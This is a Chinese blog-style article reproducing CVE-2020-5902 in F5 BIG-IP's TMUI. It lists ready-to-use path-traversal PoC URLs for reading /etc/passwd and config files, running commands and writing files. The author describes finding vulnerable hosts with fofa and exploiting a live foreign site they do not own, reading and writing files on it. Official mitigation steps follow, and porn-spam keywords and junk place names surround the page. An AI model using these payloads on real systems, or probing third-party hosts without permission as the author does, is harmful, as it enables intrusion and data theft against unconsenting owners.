亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行CVE-2020-5902簡單復現

發布時間:2021-12-27 18:41:31 來源:億速云 閱讀:175 作者:柒染 欄目:安全技術

如何進行CVE-2020-5902簡單復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

CVE-2020-5902 簡單復現

2020通報了f5的一個漏洞,想著先弄個環境保存著,說不定后面就用到了。

1、漏洞描述

近日,F5官方發布公告,修復了流量管理用戶界面(TMUI)中存在的一個遠程代碼執行漏洞(CVE-2020-5902)。此漏洞允許未經身份驗證的攻擊者或經過身份驗證的用戶通過BIG-IP管理端口和/或自身IP對TMUI進行網絡訪問,以執行任意系統命令、創建或刪除文件、禁用服務和/或執行任意Java代碼。該漏洞可能對整個系統造成危害。目前監測到網絡上已經有PoC,并且已有利用該漏洞的攻擊行為出現,建議用戶盡快升級進行防護。

F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。

參考鏈接:https://support.f5.com/csp/article/K52145254

2、受影響的版本

F5 BIG-IP 15.x 已知易受攻擊版本 15.1.0、15.0.0

F5 BIG-IP 14.x 已知易受攻擊版本 14.1.0-14.1.2

F5 BIG-IP 13.x 已知易受攻擊版本 13.1.0-13.1.3

F5 BIG-IP 12.x 已知易受攻擊版本 12.1.0-12.1.5

F5 BIG-IP 11.x 已知易受攻擊版本 11.6.1-11.6.5

3、漏洞POC
文件讀取:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE:
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

寫入文件:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456
4、復現

因為才公布出來幾天,所以網上還可以搜到許多漏洞版本的網站(其實感覺大多數site后面也不會修補。),這里嘗試搜了一下,發現還挺多,直接用國外的站點嘗試一下(畢竟自己搭環境還是挺麻煩的,但不知道搜到的具有漏洞的網站是不是蜜罐。。。)

用fofa搜一下漏洞版本:

如何進行CVE-2020-5902簡單復現

找到一個漂亮國的能正常訪問。測試一下下,發現能成功。

如何進行CVE-2020-5902簡單復現

如何進行CVE-2020-5902簡單復現

寫入文件:

如何進行CVE-2020-5902簡單復現

這里嘗試RCE列出用戶,沒有輸出

獲取shell網上也有文章寫到了,因為是真實網站,就不繼續嘗試了。:https://github.com/jas502n/CVE-2020-5902

自己搭個環境試試,版本為14.1.2,因為現在官網好像已經下不到漏洞版本了,網上隨便找了個別人下載的,但發現web頁面的賬號密碼好像被他改了(默認是admin/admin),不過不影響,也可以直接利用:

如何進行CVE-2020-5902簡單復現

如何進行CVE-2020-5902簡單復現

嘗試下msf,這里我剛開始使用的離線下載該模塊,然后手動添加到msf,但發現始終載入不了該模塊,最后也沒解決(應該是我的msf版本太低了,識別不到新模塊),這里其實新版本msf里就有該exp,不用手動添加,更新msf即可(這里遇到一個更新后msf無法啟動的問題,后面解決了,之后再總結一下吧)
如何進行CVE-2020-5902簡單復現

這里沒有成功。。后面再嘗試下(網上的文章全都一樣,只寫到了有這個模塊,沒有人說成功用exp拿到了shell。)

5、官方修復建議
通用修補建議:
升級到以下版本

BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
臨時修補建議:
官方建議可以通過以下步驟臨時緩解影響

1) 使用以下命令登錄對應系統

tmsh
2) 編輯 httpd 組件的配置文件

edit /sys httpd all-properties
3) 文件內容如下

include '
<LocationMatch "...;.">
Redirect 404 /
</LocationMatch>
'
4) 按照如下操作保存文件

按下 ESC 并依次輸入
:wq
5) 執行命令刷新配置文件

save /sys config
6) 重啟 httpd 服務

restart sys service httpd
并禁止外部IP對 TMUI 頁面的訪問

看完上述內容,你們掌握如何進行CVE-2020-5902簡單復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

洪雅县| 云霄县| 龙州县| 江城| 台湾省| 庆城县| 赤壁市| 英山县| 衡水市| 科尔| 太和县| 千阳县| 南京市| 渝北区| 黑山县| 梁山县| 永宁县| 沙河市| 永和县| 湖南省| 钟山县| 柳州市| 县级市| 文水县| 哈密市| 富源县| 荆州市| 铜鼓县| 滦平县| 和硕县| 石城县| 崇礼县| 四会市| 桓台县| 安多县| 溆浦县| 秭归县| 彩票| 公安县| 敦煌市| 多伦县|